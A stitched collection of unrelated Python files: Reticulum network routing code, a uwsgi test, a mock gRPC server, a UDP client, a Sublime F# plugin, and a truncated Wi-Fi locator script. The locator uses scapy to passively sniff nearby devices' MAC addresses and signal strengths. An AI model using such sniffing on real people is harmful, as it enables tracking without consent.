receipt_validated = receipt.validate_proof_packet(packet)
else:
# TODO: This looks like it should actually
# be rewritten when implicit proofs are added.
# In case of an implicit proof, we have
# to check every single outstanding receipt
receipt_validated = receipt.validate_proof_packet(packet)
if receipt_validated:
Transport.receipts.remove(receipt)
Transport.jobs_locked = False
@staticmethod
def register_destination(destination):
destination.MTU = RNS.Reticulum.MTU
if destination.direction == RNS.Destination.IN:
for registered_destination in Transport.destinations:
if destination.hash == registered_destination.hash:
raise KeyError("Attempt to register an already registered destination.")
Transport.destinations.append(destination)
if Transport.owner.is_connected_to_shared_instance:
if destination.type == RNS.Destination.SINGLE:
destination.announce(path_response=True)
@staticmethod
def deregister_destination(destination):
if destination in Transport.destinations:
Transport.destinations.remove(destination)
@staticmethod
def register_link(link):
RNS.log("Registering link "+str(link), RNS.LOG_DEBUG)
if link.initiator:
Transport.pending_links.append(link)
else:
Transport.active_links.append(link)
@staticmethod
def activate_link(link):
RNS.log("Activating link "+str(link), RNS.LOG_DEBUG)
if link in Transport.pending_links:
Transport.pending_links.remove(link)
Transport.active_links.append(link)
link.status = RNS.Link.ACTIVE
else:
RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR)
@staticmethod
def register_announce_handler(handler):
"""
Registers an announce handler.
:param handler: Must be an object with an *aspect_filter* attribute and a *received_announce(destination_hash, announced_identity, app_data)* callable. See the :ref:`Announce Example<example-announce>` for more info.
"""
if hasattr(handler, "received_announce") and callable(handler.received_announce):
if hasattr(handler, "aspect_filter"):
Transport.announce_handlers.append(handler)
@staticmethod
def deregister_announce_handler(handler):
"""
Deregisters an announce handler.
:param handler: The announce handler to be deregistered.
"""
while handler in Transport.announce_handlers:
Transport.announce_handlers.remove(handler)
@staticmethod
def find_interface_from_hash(interface_hash):
for interface in Transport.interfaces:
if interface.get_hash() == interface_hash:
return interface
return None
@staticmethod
def should_cache(packet):
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
return False
# When caching packets to storage, they are written
# exactly as they arrived over their interface. This
# means that they have not had their hop count
# increased yet! Take note of this when reading from
# the packet cache.
@staticmethod
def cache(packet, force_cache=False):
if RNS.Transport.should_cache(packet) or force_cache:
try:
packet_hash = RNS.hexrep(packet.get_hash(), delimit=False)
interface_reference = None
if packet.receiving_interface != None:
interface_reference = str(packet.receiving_interface)
file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "wb")
file.write(umsgpack.packb([packet.raw, interface_reference]))
file.close()
except Exception as e:
RNS.log("Error writing packet to cache", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e))
@staticmethod
def get_cached_packet(packet_hash):
try:
packet_hash = RNS.hexrep(packet_hash, delimit=False)
path = RNS.Reticulum.cachepath+"/"+packet_hash
if os.path.isfile(path):
file = open(path, "rb")
cached_data = umsgpack.unpackb(file.read())
file.close()
packet = RNS.Packet(None, cached_data[0])
interface_reference = cached_data[1]
for interface in Transport.interfaces:
if str(interface) == interface_reference:
packet.receiving_interface = interface
return packet
else:
return None
except Exception as e:
RNS.log("Exception occurred while getting cached packet.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def cache_request_packet(packet):
if len(packet.data) == RNS.Identity.HASHLENGTH/8:
packet = Transport.get_cached_packet(packet.data)
if packet != None:
# If the packet was retrieved from the local
# cache, replay it to the Transport instance,
# so that it can be directed towards it original
# destination.
Transport.inbound(packet.raw, packet.receiving_interface)
return True
else:
return False
else:
return False
@staticmethod
def cache_request(packet_hash, destination):
cached_packet = Transport.get_cached_packet(packet_hash)
if cached_packet:
# The packet was found in the local cache,
# replay it to the Transport instance.
Transport.inbound(packet.raw, packet.receiving_interface)
else:
# The packet is not in the local cache,
# query the network.
RNS.Packet(destination, packet_hash, context = RNS.Packet.CACHE_REQUEST).send()
@staticmethod
def has_path(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: *True* if a path to the destination is known, otherwise *False*.
"""
if destination_hash in Transport.destination_table:
return True
else:
return False
@staticmethod
def hops_to(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The number of hops to the specified destination, or ``RNS.Transport.PATHFINDER_M`` if the number of hops is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][2]
else:
return Transport.PATHFINDER_M
@staticmethod
def request_path(destination_hash):
"""
Requests a path to the destination from the network. If
another reachable peer on the network knows a path, it
will announce it.
:param destination_hash: A destination hash as *bytes*.
"""
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1)
packet.send()
@staticmethod
def request_path_on_interface(destination_hash, interface):
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
@staticmethod
def path_request_handler(data, packet):
if len(data) >= RNS.Identity.TRUNCATED_HASHLENGTH//8:
Transport.path_request(
data[:RNS.Identity.TRUNCATED_HASHLENGTH//8],
Transport.from_local_client(packet),
packet.receiving_interface
)
@staticmethod
def path_request(destination_hash, is_from_local_client, attached_interface):
RNS.log("Path request for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
local_destination = next((d for d in Transport.destinations if d.hash == destination_hash), None)
if local_destination != None:
RNS.log("Destination is local to this system, announcing", RNS.LOG_DEBUG)
local_destination.announce(path_response=True)
elif (RNS.Reticulum.transport_enabled() or is_from_local_client) and destination_hash in Transport.destination_table:
RNS.log("Path found, inserting announce for transmission", RNS.LOG_DEBUG)
packet = Transport.destination_table[destination_hash][6]
received_from = Transport.destination_table[destination_hash][5]
now = time.time()
retries = Transport.PATHFINDER_R
local_rebroadcasts = 0
block_rebroadcasts = True
announce_hops = packet.hops
if is_from_local_client:
retransmit_timeout = now
else:
# TODO: Look at this timing
retransmit_timeout = now + Transport.PATH_REQUEST_GRACE # + (RNS.rand() * Transport.PATHFINDER_RW)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if packet.destination_hash in Transport.announce_table:
held_entry = Transport.announce_table[packet.destination_hash]
Transport.held_announces[packet.destination_hash] = held_entry
Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, announce_hops, packet, local_rebroadcasts, block_rebroadcasts, attached_interface]
elif is_from_local_client:
# Forward path request on all interfaces
# except the local client
for interface in Transport.interfaces:
if not interface == attached_interface:
Transport.request_path_on_interface(destination_hash, interface)
elif not is_from_local_client and len(Transport.local_client_interfaces) > 0:
# Forward the path request on all local
# client interfaces
for interface in Transport.local_client_interfaces:
Transport.request_path_on_interface(destination_hash, interface)
else:
RNS.log("No known path to requested destination, ignoring request", RNS.LOG_DEBUG)
@staticmethod
def from_local_client(packet):
if hasattr(packet.receiving_interface, "parent_interface"):
return Transport.is_local_client_interface(packet.receiving_interface)
else:
return False
@staticmethod
def is_local_client_interface(interface):
if hasattr(interface, "parent_interface"):
if hasattr(interface.parent_interface, "is_local_shared_instance"):
return True
else:
return False
else:
return False
@staticmethod
def interface_to_shared_instance(interface):
if hasattr(interface, "is_connected_to_shared_instance"):
return True
else:
return False
@staticmethod
def exit_handler():
try:
if not RNS.Reticulum.transport_enabled():
Transport.packet_hashlist = []
else:
RNS.log("Saving packet hashlist to storage...", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
file = open(packet_hashlist_path, "wb")
file.write(umsgpack.packb(Transport.packet_hashlist))
file.close()
except Exception as e:
RNS.log("Could not save packet hashlist to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if not Transport.owner.is_connected_to_shared_instance:
RNS.log("Saving path table to storage...", RNS.LOG_VERBOSE)
try:
serialised_destinations = []
for destination_hash in Transport.destination_table:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
interface_hash = de[5].get_hash()
# Only store destination table entry if the associated
# interface is still active
interface = Transport.find_interface_from_hash(interface_hash)
if interface != None:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_destinations.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
file = open(destination_table_path, "wb")
file.write(umsgpack.packb(serialised_destinations))
file.close()
RNS.log("Done saving "+str(len(serialised_destinations))+" path table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save path table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
|
test_uwsgi_daemon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# Copyright (c) 2020 SBofGaySchoolBuPaAnything
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
__author__ = "chenty"
# Add current folder and parent folder into python path
import os
os.environ["PYTHONPATH"] = os.environ.get("PYTHONPATH", "") + ":" + os.getcwd()
os.environ["PYTHONPATH"] += ":" + os.path.dirname(os.getcwd())
import sys
sys.path.append(os.getcwd())
sys.path.append(os.path.dirname(os.getcwd()))
import unittest
import multiprocessing
import signal
import time
import requests
import json
import flask
import tracemalloc
tracemalloc.start()
from utility.uwsgi.daemon import run
temp_server = flask.Flask(__name__)
@temp_server.route("/")
def index():
return "Hello World!"
# Unit test class for utility.uwsgi.daemon
class TestUwsgiDaemon(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
Initialization function
:return: None
"""
print("Initializing environment.\n")
# Generate configuration files
with open("conf.json", "w") as f:
f.write(json.dumps({
"daemon": {},
"uwsgi": {
"exe": ["uwsgi", "--ini", "uwsgi.ini"],
"host": "0.0.0.0",
"port": "7000",
"module": "test_uwsgi_daemon:temp_server",
"master": True,
"processes": 2,
"threads": 2
}
}, indent=4))
# Sub processes
cls.uwsgi = None
return
def test_000_run_uwsgi_daemon(self):
"""
Test to run uwsgi through uwsgi daemon
:return: None
"""
cls = self.__class__
# Generate all daemon
cls.uwsgi = multiprocessing.Process(target=run, args=("Test", "conf.json"))
cls.uwsgi.daemon = True
cls.uwsgi.start()
time.sleep(5)
# Test http requests
self.assertEqual(requests.get("http://localhost:7000/").text, "Hello World!")
# Stop it
os.kill(cls.uwsgi.pid, signal.SIGINT)
cls.uwsgi.join()
return
@classmethod
def tearDownClass(cls):
"""
Cleaning function
:return: None
"""
print("Tearing down environment.\n")
# Stop subprocess
if cls.uwsgi and cls.uwsgi.is_alive():
if cls.uwsgi.pid:
os.kill(cls.uwsgi.pid, signal.SIGINT)
cls.uwsgi.join()
# Remove config file
os.remove("conf.json")
os.remove("uwsgi.ini")
return
if __name__ == "__main__":
unittest.main()
|
test_grpc_host_server.py
|
#!/usr/bin/env python
from concurrent import futures
import grpc
import sys
from time import sleep
from threading import Thread
sys.path.append('../../src/tira')
from proto import tira_host_pb2, tira_host_pb2_grpc
from test_grpc_host_client import TestGrpcHostClient
STATE = {"status": 'stopped'}
class TiraHostService(tira_host_pb2_grpc.TiraHostService):
def vm_backup(self, request, context):
print(f"received vm-backup for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_create(self, request, context):
print(f"received vm-create for {request.ovaFile} - {request.vmId} - {request.bulkCommandId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_delete(self, request, context):
print(f"received vm-delete for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_info(self, request, context):
print(f"received vm-info for {request.vmId}")
response = tira_host_pb2.VmInfo()
response.guestOs = 'test: ubuntu'
response.memorySize = 'test: 0'
response.numberOfCpus = 'test: 0'
response.sshPort = '0000'
response.rdpPort = '0000'
response.host = 'localhost'
if STATE.get('status') == 'running':
response.state = tira_host_pb2.State.RUNNING
response.sshPortStatus = True
response.rdpPortStatus = True
elif STATE.get('status') == 'stopped':
response.state = tira_host_pb2.State.POWERED_OFF
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'powering_on':
response.state = tira_host_pb2.State.POWERING_ON
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'powering_off':
response.state = tira_host_pb2.State.POWERING_OFF
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'sandboxed':
response.state = tira_host_pb2.State.EXECUTING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'sandboxing':
response.state = tira_host_pb2.State.SANDBOXING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'unsandboxing':
response.state = tira_host_pb2.State.UNSANDBOXING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'archived':
response.state = tira_host_pb2.State.ARCHIVED
response.sshPortStatus = False
response.rdpPortStatus = False
else:
response.state = tira_host_pb2.State.UNDEFINED
response.sshPortStatus = False
response.rdpPortStatus = False
return response
def vm_list(self, context):
print(f"received vm-list")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_sandbox(self, request, context):
print(f"received vm-sandbox for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_shutdown(self, request, context):
print(f"received vm-shutdown for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') == "running":
test_host_client = TestGrpcHostClient()
t = Thread(target=test_host_client.set_state, args=(request.vmId, tira_host_pb2.State.POWERED_OFF))
t.start()
response.status = tira_host_pb2.Status.SUCCESS
STATE['status'] = 'stopped'
else:
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_snapshot(self, request, context):
print(f"received vm-snapshot for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_start(self, request, context):
print(f"received vm-start for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') == "stopped":
test_host_client = TestGrpcHostClient()
t = Thread(target=test_host_client.set_state, args=(request.vmId, tira_host_pb2.State.RUNNING))
t.start()
STATE['status'] = 'running' # Only works in the mockup server. Should be 'powering_on' in live.
response.status = tira_host_pb2.Status.SUCCESS
else:
response.status = tira_host_pb2.Status.FAILED
return response
def vm_stop(self, request, context):
print(f"received vm-stop for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') in {"running", "sandboxed", "sandboxing"}:
response.status = tira_host_pb2.Status.SUCCESS
STATE['status'] = 'stopped'
else:
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_unsandbox(self, request, context):
print(f"received vm-unsandbox for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def run_execute(self, request, context):
print(f"received run-execute for {request.submissionFile} - {request.inputDatasetName} - {request.inputRunPath} - {request.outputDirName} - {request.sandboxed} - {request.runId} - {request.snapshotName} - {request.optionalParameters}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def run_eval(self, request, context):
print(f"received run-eval for {request.submissionFile} - {request.inputDatasetName} - {request.inputRunPath} - {request.outputDirName} - {request.sandboxed} - {request.runId} - {request.snapshotName} - {request.optionalParameters}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
tira_host_pb2_grpc.add_TiraHostServiceServicer_to_server(TiraHostService(), server)
listen_addr = f'[::]:{port}'
server.add_insecure_port(listen_addr)
server.start()
print("Starting tira-host server on %s", listen_addr)
server.wait_for_termination()
if __name__ == '__main__':
serve("50051")
|
requester.py
|
import socket
import sys
import time
import threading
import errno
from termcolor import colored, cprint
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setblocking(0)
except socket.error:
print 'Failed to create socket'
sys.exit()
host = 'localhost';
port = 8888;
msg = '__client__'
s.sendto(msg, (host, port))
ping_counter = []
ping_counter.append(0)
def pingit():
threading.Timer(3.0, pingit).start()
pingStr = '__REQUESTER_PING__'
s.sendto(pingStr, (host, port))
ping_counter[0] += 1
print ping_counter
if ping_counter[0] > 3:
print "Server Not Responding...SHUTTING DOWN"
# s.close()
# s.shutdown(socket.SHUT_RDWR)
# quit()
# s.exit()
pingit()
msg = ''
def queryFun():
myQuery = raw_input("Please enter your query-> ")
myQuery = '__SEARCH__' + myQuery
s.sendto(myQuery, (host, port))
listener = threading.Thread(target=queryFun)
listener.start()
class c:
blue = '\033[94m'
rust = '\033[93m'
red = '\033[91m'
Green = '\033[92m'
Blue = '\033[94m'
Cyan = '\033[96m'
White = '\033[97m'
Yellow = '\033[93m'
Magenta = '\033[95m'
Grey = '\033[90m'
Black = '\033[90m'
Default = '\033[99m'
while(1) :
# msg = raw_input('Enter message to send : ')
try :
d = s.recvfrom(1024*10)
reply = d[0]
addr = d[1]
# print 'Server reply : ' + reply
# replyArray = reply.split('__')
# msg = replyArray[0]
if reply == '___I_IZ_ALAIVE__':
ping_counter[0] = 0
else:
if reply == '__END_RESULTS__':
listener = threading.Thread(target=queryFun)
listener.start()
# print "LOLOLOL"
else:
myarray = reply.split()
msg = myarray[0]
for word in reply.split():
if word not in msg:
print c.Default+word,
else:
print c.red+word,
print '\n'
f = open('myfile.txt', 'a')
print >> f, reply
# for i in range(0, 1000000):
# f.write(reply)
# f.close()
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
# print 'Wating for data(server)'
time.sleep(0.001)
else:
print e
continue
# except socket.error, msg:
# print 'Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
# sys.exit()
|
project.py
|
import sublime
import sublime_plugin
from queue import Queue
import queue
from threading import Thread
from zipfile import ZipFile
import os
from FSharp.lib import const
from FSharp.lib.fsac import get_server
from FSharp.lib import fs
tasks = Queue()
task_results = Queue()
SIG_QUIT = '<<QUIT>>'
def plugin_loaded():
"""
Initializes plugin.
"""
# Install binaries if needed.
if not installation.check_binaries():
installation.install_binaries()
print('FSharp: Binaries installed. Everything ok.')
else:
print('FSharp: Binaries found. Everything ok.')
# Start the pipe server.
AsyncPipe()
def plugin_unloaded():
tasks.put((SIG_QUIT, ()))
class AsyncPipe(object):
"""
Wraps the fsac server to make it asynchronous.
"""
def __init__(self):
self.server = get_server()
self.tasks = tasks
writer = Thread(target=self.write, daemon=True)
reader = Thread(target=self.read, daemon=True)
writer.start()
reader.start()
def write(self):
while True:
action, args = self.tasks.get()
method = getattr(self.server, action, None)
if self.server.proc.poll() is not None:
print("FSharp: Server process unavailable. "
"Exiting writer thread.")
break
if not method:
process_output({'Kind': 'ERROR', 'Data': 'Not a valid call.'})
continue
if action == SIG_QUIT:
# Give the other thread a chance to exit.
self.tasks.put((action, args))
break
# Write to server's stdin.
method(*args)
def read(self):
while True:
output = self.server.read_line()
if output['Kind'] == 'completion':
task_results.put(output)
else:
process_output(output)
if self.server.proc.poll() is not None:
print("FSharp: Server process unavailable. "
"Exiting reader thread.")
break
try:
# Don't block here so we can read all the remaining output.
action, args = self.tasks.get(timeout=0.01)
except:
continue
if action == SIG_QUIT:
# Give the other thread a chance to exit.
self.tasks.put((action, args))
break
self.tasks.put((action, args))
class actions:
"""
Groups methods that process data received from the autocomplete server.
"""
@staticmethod
def generic_action(data=None):
sublime.status_message("RECEIVED: " + str(data))
print("RECEIVED: " + str(data))
@staticmethod
def show_info(data):
print(data)
@staticmethod
def find_declaration(data):
data = data['Data']
fname = data['File']
row = data['Line'] + 1
col = data['Column'] + 1
encoded = "{0}:{1}:{2}".format(fname, row, col)
sublime.active_window().open_file(encoded, sublime.ENCODED_POSITION)
@staticmethod
def declarations(data):
decls = data['Data']
print(decls)
@staticmethod
def show_completions(data):
v = sublime.active_window().active_view()
v.show_popup_menu(data['Data'], None)
@staticmethod
def show_tooltip(data):
v = sublime.active_window().active_view()
v.show_popup_menu([line for line in data['Data'].split('\n') if line],
None)
class requests:
@staticmethod
def parse(view):
tasks.put(('parse', (view.file_name(), True)))
@staticmethod
def completions(view):
requests.parse(view)
row, col = view.rowcol(view.sel()[0].b)
tasks.put(('completions', (view.file_name(), row, col)))
@staticmethod
def declarations(view):
requests.parse(view)
tasks.put(('declarations', (view.file_name(),)))
@staticmethod
def tooltip(view):
requests.parse(view)
row, col = view.rowcol(view.sel()[0].b)
tasks.put(('tooltip', (view.file_name(), row, col)))
def process_output(data):
action = None
if data['Kind'] == 'completion':
raise ValueError('completion results should be handled in a different way')
elif data['Kind'] == 'tooltip':
action = actions.show_tooltip
elif data['Kind'] == 'INFO':
action = actions.show_info
elif data['Kind'] == 'finddecl':
action = actions.find_declaration
elif data['Kind'] == 'declarations':
action = actions.declarations
elif data['Kind'] == 'project':
for fname in data['Data']:
tasks.put(('parse', (fname, True)))
else:
action = actions.generic_action
if action:
# Run action on the main UI thread to make ST happy.
sublime.set_timeout(lambda: action(data), 0)
class installation:
@staticmethod
def check_binaries():
print('FSharp: Checking installed files')
return os.path.exists(const.path_to_fs_ac_binary())
@staticmethod
def install_binaries():
print('FSharp: Installing files to Packages/FSharp_Binaries...')
sublime.status_message('FSharp: Installing files to Packages/FSharp_Binaries...')
try:
os.mkdir(const.path_to_fs_binaries())
except IOError:
pass
zipped_bytes = sublime.load_binary_resource('Packages/FSharp/bundled/fsautocomplete.zip')
target = os.path.join(const.path_to_fs_binaries(), 'fsautocomplete.zip')
with open(target, 'wb') as f:
f.write(zipped_bytes)
with open(target, 'rb') as f:
ZipFile(f).extractall(path=const.path_to_fs_binaries())
os.unlink(target)
class FsSetProjectFile(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_project(v.file_name()):
return True
msg = 'FSharp: Not a project file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
sublime.status_message('FSharp: Loading project...')
tasks.put(('project', (v.file_name(),)))
class FsGetTooltip(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_code(v.file_name()):
return True
msg = 'FSharp: Not an F# code file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
requests.tooltip(v)
class FsDeclarations(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_code(v.file_name()):
return True
msg = 'FSharp: Not an F# code file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
requests.declarations(v)
class FsStEvents(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
if not fs.is_fsharp_code(view.file_name()):
return []
while not task_results.empty():
task_results.get()
# A request for completions is treated especially: the result will
# be published to a queue.
requests.completions(view)
completions = []
try:
completions = task_results.get(timeout=0.2)
completions = completions['Data']
except queue.Empty:
# Too bad. The daemon was too slow.
pass
# TODO: Necessary? (It seems so.)
flags = (sublime.INHIBIT_EXPLICIT_COMPLETIONS |
sublime.INHIBIT_WORD_COMPLETIONS)
return [[c, c] for c in completions], flags
|
Marauders.py
|
# -*- coding: utf-8 -*-
from math import sqrt, floor, ceil
import os, time, sys, yaml, kirk
import Tkconstants as C
#import tkinter.constants as C
from Tkinter import Tk, Frame, LEFT, Button, Label, PhotoImage, TOP, \
FLAT, BOTH, Image
from PIL import Image, ImageTk, ImageDraw
import threading
import thread
import sys
import signal
import scapy.all as sca
import scapy_ex
import channel_hop
import pickle
import numpy as n
import signal
from subprocess import Popen, PIPE
iface = None
realt = False
fingerprint = {}
box_size = 15
map_size = 240//box_size
radiotap_formats = {"TSFT":"Q", "Flags":"B", "Rate":"B",
"Channel":"HH", "FHSS":"BB", "dBm_AntSignal":"b", "dBm_AntNoise":"b",
"Lock_Quality":"H", "TX_Attenuation":"H", "dB_TX_Attenuation":"H",
"dBm_TX_Power":"b", "Antenna":"B", "dB_AntSignal":"B",
"dB_AntNoise":"B", "b14":"H", "b15":"B", "b16":"B", "b17":"B", "b18":"B",
"b19":"BBB", "b20":"LHBB", "b21":"HBBBBBH", "b22":"B", "b23":"B",
"b24":"B", "b25":"B", "b26":"B", "b27":"B", "b28":"B", "b29":"B",
"b30":"B", "Ext":"B"}
def parsePacket(pkt):
if pkt.haslayer(sca.Dot11):
if pkt.addr2 is not None:
return pkt.addr2, pkt.dBm_AntSignal
return None, None
class FlatButton(Button):
def __init__(self, master=None, cnf={}, **kw):
Button.__init__(self, master, cnf, **kw)
self.config(
compound=TOP,
relief=FLAT,
bd=0,
bg="#b91d47", # dark-red
fg="white",
activebackground="#b91d47", # dark-red
activeforeground="white",
highlightthickness=0
)
def set_color(self, color):
self.configure(
bg=color,
fg="white",
activebackground=color,
activeforeground="white"
)
class Marauders(Frame):
doc = None
framestack = []
icons = {}
path = ''
def __init__(self, parent):
Frame.__init__(self, parent, background="white")
self.parent = parent
self.pack(fill=BOTH, expand=1)
self.path = os.path.dirname(os.path.realpath(sys.argv[0]))
with open(self.path + '/Marauders.yaml', 'r') as f:
self.doc = yaml.load(f)
self.show_items(self.doc)
def show_items(self, items, upper=[]):
"""
Creates a new page on the stack, automatically adds a back button when there are
pages on the stack already
:param items: list the items to display
:param upper: list previous levels' ids
:return: None
"""
num = 0
# create a new frame
wrap = Frame(self, bg="black")
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command=self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=0, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num +=1
exitbtn.grid(row=0, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num += 1
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
# calculate tile distribution
all = len(items) + num
rows = floor(sqrt(all))
cols = ceil(all / rows)
# make cells autoscale
for x in range(int(cols)):
wrap.columnconfigure(x, weight=1)
for y in range(int(rows)):
wrap.rowconfigure(y, weight=1)
# display all given buttons
for item in items:
act = upper + [item['name']]
if 'icon' in item:
image = self.get_icon(item['icon'])
else:
image = self.get_icon('scrabble.' + item['label'][1:1].lower())
btn = FlatButton(
wrap,
text=item['label'],
image=image
)
if 'items' in item:
# this is a deeper level
btn.configure(command=lambda act=act, item=item:
self.show_items(item['items'], act), text=item['label'] + '…')
btn.set_color("#2b5797") # dark-blue
elif item['name'] == 'Locator':
# this is an action
btn.configure(command=lambda act=act: self.realtime(), )
else:
# this is an action
print act
btn.configure(command=lambda act=item['name']: self.capture(act), )
if 'color' in item:
btn.set_color(item['color'])
# add button to the grid
btn.grid(
row=int(floor(num / cols)),
column=int(num % cols),
padx=1,
pady=1,
sticky=C.W + C.E + C.N + C.S
)
num += 1
def get_icon(self, name):
"""
Loads the given icon and keeps a reference
:param name: string
:return:
"""
if name in self.icons:
return self.icons[name]
ico = self.path + '/ico/' + name + '.gif'
# In case icon cannot be found display the cancel icon
if not os.path.isfile(ico):
ico = self.path + '/ico/cancel.gif'
self.icons[name] = PhotoImage(file=ico)
return self.icons[name]
def hide_top(self):
"""
hide the top page
:return:
"""
self.framestack[len(self.framestack) - 1].pack_forget()
def show_top(self):
"""
show the top page
:return:
"""
self.framestack[len(self.framestack) - 1].pack(fill=BOTH, expand=1)
def record(self, x, y, z, iface):
global fingerprint
now = time.time()
rssi={}
future = now + 10
while time.time() < future:
#os.system("sudo hciconfig hci0 reset")
#p = Popen([self.path+"/ibeacon_scan","-b"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
packets = sca.sniff(iface=iface, timeout = 10)
#os.killpg(p.pid, signal.SIGTERM)
#bl_packets = p.stdout.read().split('\n')
bl_packets = [] #Empty bluetooth until it works properly
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in rssi:
if z in rssi[mac]:
